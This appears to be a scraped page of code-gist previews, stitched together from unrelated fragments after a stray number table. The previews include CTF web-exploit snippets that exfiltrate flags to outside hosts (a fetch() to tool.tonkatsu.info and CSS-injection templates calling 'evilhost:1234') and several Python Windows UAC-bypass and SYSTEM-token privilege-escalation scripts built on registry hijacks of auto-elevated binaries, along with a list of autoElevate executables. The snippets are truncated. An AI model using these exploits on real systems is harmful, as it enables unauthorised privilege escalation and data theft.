Sleep | Binary |
---|---|
15 | 1111 |
14 | 1110 |
13 | 1101 |
12 | 1100 |
11 | 1011 |
10 | 1010 |
9 | 1001 |
8 | 1000 |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
<iframe id="ifr0" src="https://matrona.club/?calc=A.B=B" width=1000 height=500 sandbox="allow-scripts allow-top-navigation allow-same-origin allow-forms"></iframe> | |
<iframe id="ifr1" src="https://matrona.club/?calc=A.B=B" width=1000 height=500 sandbox="allow-scripts allow-top-navigation allow-same-origin allow-forms"></iframe> | |
<script> | |
window.addEventListener('hashchange', (evt) => { | |
const flag = evt.newURL.match(/CTF-BR\{.*\}/)[0] | |
fetch(`//tool.tonkatsu.info/?flag=${encodeURIComponent(flag)}`) | |
}) | |
</script> |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
import time | |
import requests | |
host = 'evilhost:1234' | |
start_template = 'input.sgn[value^="%02x"]{content:url(http://'+host+'/s/%02x);}' | |
triple_template = 'input.sgn[value*="%03x"]~button{--p%s:url(http://'+host+'/q/%03x);}' | |
timestamp_template = 'input.timestamp[value="%s"]{background:url(http://'+host+'/t/%s);}' | |
frames = '''button{animation:l1 35s;} |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
# -*- coding: utf-8 -*- | |
# All credits go to https://tyranidslair.blogspot.gr/2017/05/exploiting-environment-variables-in.html | |
''' | |
SilentCleanup has a "Highest" RunLevel meaning it will elevate the scheduled task to administrator without any prompting. | |
It also contains enviroment variables in the path set on "Execute" (%windir%\system32\cleanmgr.exe), the Enviroment variables are stored in the HKCU registry hive which is write accesible by a user. (HKCU\Environment) | |
We can perform a AlwaysNotify UAC Bypass by changing the enviroment variable's 'windir' value to our own payload and triggering it through the SilentCleanup scheduled task. | |
''' | |
from _winreg import * | |
HKCU = ConnectRegistry(None, HKEY_CURRENT_USER) |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
# -*- coding: UTF-8 -*- | |
from ctypes.wintypes import * | |
from ctypes import * | |
from enum import IntEnum | |
# These libraries have the APIs we need | |
kernel32 = WinDLL('kernel32', use_last_error=True) | |
advapi32 = WinDLL('advapi32', use_last_error=True) | |
psapi = WinDLL('psapi.dll', use_last_error=True) |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
# -*- coding: utf-8 -*- | |
# All credits go to https://github.com/mrfuzzy8/Scripts/blob/master/Invoke-CompMgmtLauncherBypass.ps1 += https://enigma0x3.net/2016/08/15/fileless-uac-bypass-using-eventvwr-exe-and-registry-hijacking/ | |
''' | |
CompMgmtLauncher.exe is an auto-elevated binary that is vulnerable to Image Hijack on the .msc file extension. | |
Read access to HKCU\Software\Classes\mscfile\shell\open\command is perfomed with "mmc.exe" as a default value which then invokes eventvwr.msc,if “NAME NOT FOUND” it goes to HKCR\mscfile\shell\open\command. | |
Due to the registry key being accessible from user mode once we inject can inject an arbitray file to be executed with High IL. | |
''' | |
from _winreg import * | |
HKCU = ConnectRegistry(None, HKEY_CURRENT_USER) |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
# -*- coding: UTF-8 -*- | |
# All credits go to: https://github.com/joren485/PyWinPrivEsc/blob/master/RunAsSystem.py | |
from ctypes.wintypes import * | |
from ctypes import * | |
from enum import IntEnum | |
# These libraries have the APIs we need | |
kernel32 = WinDLL('kernel32', use_last_error=True) | |
advapi32 = WinDLL('advapi32', use_last_error=True) | |
psapi = WinDLL('psapi.dll', use_last_error=True) |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
# -*- coding: utf-8 -*- | |
# All credits go to CIA: https://gist.github.com/hfiref0x/59c689a14f1fc2302d858ae0aa3f6b86 (please don't hack me <3 :)) | |
# This is trully a Always Notify UAC Bypass,cause it uses process enumeration to find elevated processes. Since you need administrative privileges to get TOKEN_ELEVATION,we look for processes with manifests that have <autoElevate></autoElevate> set to True. | |
from ctypes.wintypes import * | |
from ctypes import * | |
from enum import IntEnum | |
kernel32 = WinDLL('kernel32', use_last_error=True) | |
advapi32 = WinDLL('advapi32', use_last_error=True) | |
shell32 = WinDLL('shell32' , use_last_error=True) |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
# -*- coding: utf-8 -*- | |
# All credits go to https://github.com/bytecode-77/slui-file-handler-hijack-privilege-escalation | |
''' | |
slui.exe is an auto-elevated binary that is vulnerable to file handler hijacking. | |
Read access to HKCU\Software\Classes\exefile\shell\open is performed upon execution. | |
Due to the registry key being accessible from user mode, an arbitrary executable file can be injected. | |
''' | |
from _winreg import * | |
HKCU = ConnectRegistry(None, HKEY_CURRENT_USER) |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
C:\Windows\System32\bthudtask.exe: <autoElevate>true</autoElevate> | |
C:\Windows\System32\changepk.exe: <autoElevate>true</autoElevate> | |
C:\Windows\System32\ComputerDefaults.exe: <autoElevate>true</autoElevate> | |
C:\Windows\System32\dccw.exe: <autoElevate>true</autoElevate> | |
C:\Windows\System32\dcomcnfg.exe: <autoElevate>true</autoElevate> | |
C:\Windows\System32\DeviceEject.exe: <autoElevate>true</autoElevate> | |
C:\Windows\System32\DeviceProperties.exe: <autoElevate>true</autoElevate> | |
C:\Windows\System32\djoin.exe: <autoElevate>true</autoElevate> | |
C:\Windows\System32\easinvoker.exe: <autoElevate>true</autoElevate> | |
C:\Windows\System32\EASPolicyManagerBrokerHost.exe: <autoElevate>true</autoElevate> |
NewerOlder